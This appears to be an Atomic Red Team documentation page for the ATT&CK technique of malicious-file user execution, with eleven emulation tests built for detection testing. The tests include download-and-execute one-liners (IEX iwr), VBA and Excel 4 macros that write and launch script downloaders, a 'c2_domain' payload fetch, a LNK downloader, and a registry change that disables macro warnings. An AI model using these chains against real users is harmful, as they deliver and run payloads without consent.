Try it using Invoke-Atomic

User Execution: Malicious File

Description from ATT&CK

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of Masquerading and Obfuscated Files or Information to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)

While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

Atomic Tests

Atomic Test #1 - OSTap Style Macro Execution

This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents. This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns. References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader

Supported Platforms: windows

auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff

Inputs:

Name Description Type Default Value
jse_path Path for the macro to write out the "malicious" .jse file    
string C:\Users\Public\art.jse    
ms_product Maldoc application Word or Excel string Word

Attack Commands: Run with powershell!

1
2
3
4
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"

Cleanup Commands:

1
Remove-Item #{jse_path} -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Microsoft #{ms_product} must be installed

Check Prereq Commands:

1
2
3
4
5
6
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"

Atomic Test #2 - OSTap Payload Download

Uses cscript //E:jscript to download a file

Supported Platforms: windows

auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80

Inputs:

Name Description Type Default Value
script_file File to execute jscript code from path %TEMP%\OSTapGet.js
file_url URL to retrieve file from url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt

Attack Commands: Run with command_prompt!

1
2
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile('ostapout.txt', 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}

Cleanup Commands:

1
del #{script_file} /F /Q >nul 2>&1

Atomic Test #3 - Maldoc choice flags command execution

This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.

Supported Platforms: windows

auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18

Inputs:

Name Description Type Default Value
ms_product Maldoc application Word or Excel string Word

Attack Commands: Run with powershell!

1
2
3
4
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"

Dependencies: Run with powershell!

Description: Microsoft #{ms_product} must be installed

Check Prereq Commands:

1
2
3
4
5
6
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"

Atomic Test #4 - OSTAP JS version

Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.

Supported Platforms: windows

auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911

Inputs:

Name Description Type Default Value
jse_path jse file to execute with wscript path C:\Users\Public\art.jse
ms_product Maldoc application Word or Excel string Word

Attack Commands: Run with powershell!

1
2
3
4
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"

Dependencies: Run with powershell!

Description: Microsoft #{ms_product} must be installed

Check Prereq Commands:

1
2
3
4
5
6
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"

Atomic Test #5 - Office launching .bat file from AppData

Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.

Supported Platforms: windows

auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa

Inputs:

Name Description Type Default Value
bat_path Path to malicious .bat file string $("$env:temp\art1204.bat")
ms_product Maldoc application Word or Excel string Word

Attack Commands: Run with powershell!

1
2
3
4
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c #{bat_path} `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}

Cleanup Commands:

1
2
Remove-Item #{bat_path} -ErrorAction Ignore
Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process

Dependencies: Run with powershell!

Description: Microsoft #{ms_product} must be installed

Check Prereq Commands:

1
2
3
4
5
6
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"

Atomic Test #6 - Excel 4 Macro

This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious" VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.

A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated with Excel matches that of the local system. This username can be found under Files -> Options -> Username

Supported Platforms: windows

auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052

Inputs:

Name Description Type Default Value
download_url Download URL string https://live.sysinternals.com/procexp.exe
uname Username for pathing string $env:Username

Attack Commands: Run with powershell!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
  Remove-Item $fname
  Remove-Item $fname1
}

$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()

if ("#{uname}" -ne "") {
  $sheet.Cells.Item(1,1) = "#{uname}"
} else {
  $sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}

$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()

[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()

Remove-Variable xlBook
Remove-Variable xlApp

Cleanup Commands:

1
2
3
Stop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Microsoft Excel must be installed

Check Prereq Commands:

1
2
3
4
5
try {
  New-Object -COMObject "Excel.Application" | Out-Null
  Stop-Process -Name "Excel"
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"

Atomic Test #7 - Headless Chrome code execution via VBA

This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver and pull down the script and execute it. By default the payload will execute calc.exe on the system.

Supported Platforms: windows

auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"

Cleanup Commands:

1
Stop-Process -name mshta

Dependencies: Run with powershell!

Description: Microsoft Word must be installed

Check Prereq Commands:

1
2
3
4
try {
  $wdApp = New-Object -COMObject "Word.Application"
  Stop-Process -Name "winword"
  exit 0 } catch { exit 1 }

Get Prereq Commands:

1
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

Description: Google Chrome must be installed

Check Prereq Commands:

1
2
3
4
try {
  $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
Write-Host "You will need to install Google Chrome manually to meet this requirement"

Atomic Test #8 - Potentially Unwanted Applications (PUA)

The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).

Supported Platforms: windows

auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295

Inputs:

Name Description Type Default Value
pua_url url to PotentiallyUnwanted.exe url http://amtso.eicar.org/PotentiallyUnwanted.exe
pua_file path to PotentiallyUnwanted.exe path $env:TEMP/PotentiallyUnwanted.exe

Attack Commands: Run with powershell!

1
2
Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
& "#{pua_file}"

Cleanup Commands:

1
2
Stop-Process -name PotentiallyUnwanted
Remove-Item #{pua_file} -ErrorAction Ignore

Atomic Test #9 - Office Generic Payload Download

This Test uses a VBA macro to launch Powershell which will download a file from a user defined web server. Required input agruments are c2_domain and file_name Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents. Example for c2 server located at 127.0.0.1 for the file test.txt which is nested below the parent directory in the tests/my-test folder Example input args for file in root directory c2-domain = 127.0.0.1, file-name = test.txt

Supported Platforms: windows

auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | macro_path | Location of file which will be converted to a VBA macro | path | PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt | | c2_domain | This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. | url | None | | c2_parent_directory | Parent directory where you have the "malicious" file on c2_domain server. Will default to root directory. Forward slashes are not needed at begining or ending of directory path | path | | | file_name | "Malicious" file to be downloaded. This required file needs to be place on the user provided c2 domain Example file can be found at PathToAtomicsFolder/T1204.002/src/test9-example-payload.txt | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/test9-example-payload.txt | | ms_product | Maldoc application Word or Excel | string | Word |

Attack Commands: Run with powershell!

1
2
3
4
5
6
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macroCode = Get-Content "#{macro_path}" -Raw
$URL = "#{c2_domain}" + "/" + "#{c2_parent_directory}"
$macroCode = $macroCode -replace 'serverPath', $URL -replace 'fileName', "#{file_name}"
Invoke-MalDoc -macroCode $macroCode -officeProduct "#{ms_product}"

Cleanup Commands:

1
Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Destination c2_domain name or IP address must be set to a running HTTP server.

Check Prereq Commands:

1
if (#{c2_domain}) (exit 0) else (exit 1)

Get Prereq Commands:

1
Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service"

Description: Microsoftt #{ms_product} must be installed

Check Prereq Commands:

1
2
3
4
5
6
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"

Atomic Test #10 - LNK Payload Download

This lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496

Supported Platforms: windows

auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
4
5
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
$file1 = "$env:Temp\test10.lnk"
Start-Process $file1
Start-Sleep -s 10
taskkill /IM a.exe /F

Cleanup Commands:

1
2
3
4
$file1 = "$env:Temp\test10.lnk"
$file2 = "$env:Temp\a.exe"
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore

Atomic Test #11 - Mirror Blast Emulation

Emulates the JS -> MSI chain of the MirrorBlast T505 campaign by executing an xlsm file designed. Requires the 32 bit version of Office to run. MirrorBlast Campaign Analysis

Supported Platforms: windows

auto_generated_guid: 24fd9719-7419-42dd-bce6-ab3463110b3c

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
Cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force | Out-Null
& '.\Excel 2016.lnk' "PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm"

Cleanup Commands:

1
reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f

source